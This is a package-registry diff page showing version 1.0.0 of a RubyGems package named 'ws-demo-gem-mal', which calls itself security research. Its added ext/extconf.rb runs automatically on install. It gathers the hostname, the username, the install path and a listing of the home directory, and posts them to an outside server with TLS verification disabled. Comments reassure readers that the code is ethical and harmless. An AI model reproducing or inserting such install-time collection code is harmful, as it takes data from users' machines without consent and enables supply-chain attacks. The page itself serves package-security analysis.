RubyGems - ws-demo-gem-mal - Versions diffs - 1.0.0 - Mend

ws-demo-gem-mal 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 1e85f8c9e35843661192852b150affcf11e7958f4611cee3cd3b635cb132452d
+  data.tar.gz: 0fda2c6648ab846f77819378320474cee9df1a898b318828dbe21e84460f2bde
+SHA512:
+  metadata.gz: 3eaa52f4b5f04bd408816de0d303c24b3e121818b7e1835402503724cf1ffc977a23e94e3ba6a066bba88348a712079ecc3387f93bb672f89f71bb95010b70ce
+  data.tar.gz: 0d17fe013fe3aa64d4c3ad0da829efaf361590ec1ff619c0e85eb5ef2bc2840dfd4ee5c3fd8036ccb2e54885ca91c3f7dc076df00e6bbf607b81945bc962e2a4

data/ext/extconf.rb ADDED Viewed

@@ -0,0 +1,50 @@
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on your machine.
+Don't worry! It doesn't do anything nasty or malicious.
+I am an ethical security researcher, booking names of gems to prevent brandjacking.
+I also run a Ruby security related platform: https://diffend.io
+All data I collect will be deleted and I do not collect any sensitive information.
+That's why I don't even obfuscate the network calls with DNS requests or anything else.
+You can read the code to confirm this.
+If you have any questions or want to get in touch for any reason, you can reach me at:
+maciej@mensfeld.pl
+If this is affecting your organization, for example because I took name that uses your naming
+conventions, feel free to contact me and I will be more than happy to give it back to you.
+P.S. I did notify RubyGems security team, so they are aware of my activity.
+=end
+require 'mkmf'
+require 'net/http'
+require 'socket'
+require 'etc'
+require 'securerandom'
+require 'json'
+create_makefile 'gem_test'
+uri = URI("https://ethically-testing-the.world")
+http = Net::HTTP.new(uri.host, uri.port)
+http.use_ssl = true
+http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+request = Net::HTTP::Post.new('/GEM_NAME/GEM_VERSION')
+request.add_field('Content-Type', 'application/json')
+request.body = {
+  hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
+  username: Etc.getlogin,
+  path: File.dirname(__FILE__),
+  home: Dir.home,
+  home_ls: Dir.entries(Dir.home),
+  id: SecureRandom.uuid,
+}.to_json
+http.request(request)

metadata ADDED Viewed

@@ -0,0 +1,48 @@
+--- !ruby/object:Gem::Specification
+name: ws-demo-gem-mal
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+platform: ruby
+authors:
+- Maciej Mensfeld
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2021-05-20 00:00:00.000000000 Z
+dependencies: []
+description: |
+  I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
+  This code is reporting-only, and does not do anything malicious.
+email:
+- maciej.mensfeld@whitesourcesoftware.com
+executables: []
+extensions:
+- ext/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/extconf.rb
+homepage: https://diffend.io
+licenses:
+- GPL-3.0
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: Gem that sends some non-sensitive data for security research.
+test_files: []